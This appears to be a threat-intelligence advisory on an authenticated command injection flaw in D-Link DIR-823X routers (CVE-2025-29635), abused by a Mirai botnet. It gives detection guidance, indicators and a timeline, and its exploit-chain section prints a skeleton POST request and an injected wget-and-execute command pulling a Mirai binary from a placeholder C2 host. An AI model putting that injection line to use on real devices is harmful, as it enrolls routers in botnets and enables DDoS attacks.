TP-EXP-2025-0005 CVE-2025-29635 high Active Exploitation AI Draft

D-Link DIR-823X Authenticated Command Injection via set_prohibiting API (CVE-2025-29635)

CVE CVE-2025-29635 Platform D-Link DIR-823X firmware 240126 / 240802 Type Command Injection
Severity HIGH
Status Active Exploitation
Zero-Day No
Disclosed March 25, 2025
CISA KEV Listed

Severity Assessment

  • Exploitability: 6/10 — Requires valid administrative credentials; exploitability increases substantially in environments with default or reused passwords, which are prevalent in consumer and SMB router deployments
  • Impact: 8/10 — Full command execution with root privileges on the router; enables persistent access, traffic interception, lateral movement to the local network, and botnet enrollment
  • Weaponization Risk: 9/10 — Active Mirai botnet campaign confirmed by Akamai in April 2026; public PoC (now removed from GitHub) was available prior to exploitation wave
  • Patch Urgency: 10/10 — CISA KEV-listed (2026-04-24), federal deadline 2026-05-08; D-Link has reached EOL/EOS for DIR-823X and will not produce a patch; only remediation is device replacement
  • Detection Coverage: 4/10 — Consumer routers typically lack logging infrastructure; exploitation is difficult to detect without out-of-band network monitoring for anomalous outbound traffic

Summary

CVE-2025-29635 is a command injection vulnerability in the D-Link DIR-823X router, a WiFi 6 (802.11ax) device targeted at consumer and small-business markets. The vulnerability resides in the /goform/set_prohibiting API endpoint, which handles URL filtering and access prohibition configuration. The endpoint fails to adequately sanitize user-supplied input before incorporating it into a system-level command call, allowing an authenticated attacker to inject and execute arbitrary shell commands on the router’s underlying embedded Linux operating system.

An attacker with valid administrative credentials can send a crafted HTTP POST request to the vulnerable endpoint, causing the router firmware to execute attacker-controlled commands with root-level privileges. The CVSS 3.1 base score is 7.2 (High) with the vector CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H. The PR:H designation reflects the requirement for administrative credentials, which Mirai-family threat actors routinely obtain by credential stuffing against default and commonly reused router passwords.

D-Link confirmed in security advisory SAP10469 (published September 2025) that all hardware revisions of the DIR-823X have reached End of Life (EOL) and End of Service (EOS). D-Link stated it will not produce a patch for this or any other vulnerability affecting this product line, and strongly recommends that users retire and replace the device. No firmware remediation exists or will be produced.

CISA added CVE-2025-29635 to the Known Exploited Vulnerabilities catalog on 2026-04-24 with a federal agency remediation deadline of 2026-05-08. Akamai documented active exploitation in April 2026 in a Mirai botnet campaign targeting D-Link devices, in which compromised routers were enrolled as DDoS nodes.

CVE-2025-29635 was disclosed via NVD on 2025-03-25. Active exploitation was confirmed approximately thirteen months later in April 2026, classifying it as a known-exploited n-day vulnerability.

Exploit Chain

Stage 1: Administrative Credential Acquisition

The attacker obtains valid administrative credentials for the target DIR-823X router. Common acquisition methods include credential stuffing using vendor-default password combinations (D-Link routers ship with predictable default credentials), brute-force attacks against the router web interface if remote management is enabled, and credential harvesting from previously compromised devices or networks sharing the same password.

Stage 2: Reconnaissance of the Management Interface

The attacker accesses the DIR-823X web management interface and identifies the firmware version (240126 or 240802) as vulnerable. The /goform/set_prohibiting endpoint is part of the router’s parental controls and URL filtering functionality and is present in both affected firmware builds.

Stage 3: Command Injection via Crafted POST Request

The attacker sends an HTTP POST request to /goform/set_prohibiting with a payload that injects shell metacharacters into a field processed by the router’s command execution handler. Example structure (parameters and injection point vary by firmware version):

POST /goform/set_prohibiting HTTP/1.1
Host: <router_ip>
Cookie: uid=<session_token>
Content-Type: application/x-www-form-urlencoded

prohibiting_addr=<injected_payload>&...

The router firmware concatenates the attacker-controlled value into a shell command without sanitization. A payload such as ; wget http://<c2>/mirai.arm -O /tmp/m; chmod +x /tmp/m; /tmp/m causes the router to download and execute a Mirai agent binary.

Stage 4: Botnet Enrollment and Persistence

The Mirai agent binary connects to a command-and-control server and registers the compromised router as a DDoS-capable bot. Mirai persists on rebooting routers by writing to temporary storage and re-downloading the binary if removed. The compromised router is then used to conduct volumetric network flood attacks against external targets designated by the C2 operator.

Detection Guidance

Network-based monitoring (most effective for consumer routers):

  • Monitor DNS queries and outbound connections from router management IP addresses to unfamiliar external hosts, particularly during off-hours; Mirai C2 registration traffic produces distinctive DNS lookup patterns
  • Alert on outbound connections from the router’s management interface to known Mirai C2 IP ranges and botnets tracked by threat intelligence feeds
  • Monitor for sudden spikes in outbound UDP or TCP traffic from devices behind the router consistent with DDoS flood participation

Web server log review (if accessible):

  • Review router access logs for POST requests to /goform/set_prohibiting from unexpected source IP addresses or at unexpected times
  • Flag requests containing shell metacharacters (; | & $ \ > < ( )`) in POST body parameters associated with the prohibition URL filtering fields

Authentication anomaly detection:

  • Alert on multiple failed login attempts to the router web interface from external IP addresses — indicative of credential stuffing preceding exploitation
  • Disable remote management on the WAN interface if not required; restrict access to trusted LAN IPs only

Firmware and device posture:

  • Inventory all D-Link DIR-823X devices and confirm firmware version; both 240126 and 240802 are vulnerable and no patch exists
  • Since no remediation is available, the recommended action is device replacement per D-Link’s own advisory

Indicators of Compromise

The following indicators are characteristic of Mirai botnet exploitation of CVE-2025-29635 as documented by Akamai and CISA in April 2026.

  • POST requests to /goform/set_prohibiting in router web server logs from unexpected IP addresses
  • Unexpected outbound connections from the router to external IP addresses not associated with ISP infrastructure or legitimate update services, particularly on high UDP or raw socket ports
  • Presence of unknown processes or binary files in /tmp/ on the router filesystem (accessible via Telnet/SSH diagnostic access if enabled)
  • Unusual outbound traffic volume from the router’s WAN interface inconsistent with normal household or business usage patterns
  • D-Link DIR-823X devices running firmware 240126 or 240802 with no firmware upgrade path available

Disclosure Timeline

DateEvent
2025-03-25CVE-2025-29635 published to MITRE/NVD with command injection description; firmware versions 240126 and 240802 identified as affected
2025-09-29D-Link publishes security advisory SAP10469 acknowledging DIR-823X EOL/EOS status and declining to produce a patch
2026-04-24Akamai publishes research documenting active Mirai botnet campaign targeting D-Link DIR-823X devices via CVE-2025-29635
2026-04-24CISA adds CVE-2025-29635 to the Known Exploited Vulnerabilities catalog with a federal remediation deadline of 2026-05-08

Sources & References

d-linkdir-823xcommand-injectioncwe-77routeriotmiraibotnetcisa-kevwont-fixend-of-lifeauthenticated-attacknetwork-infrastructure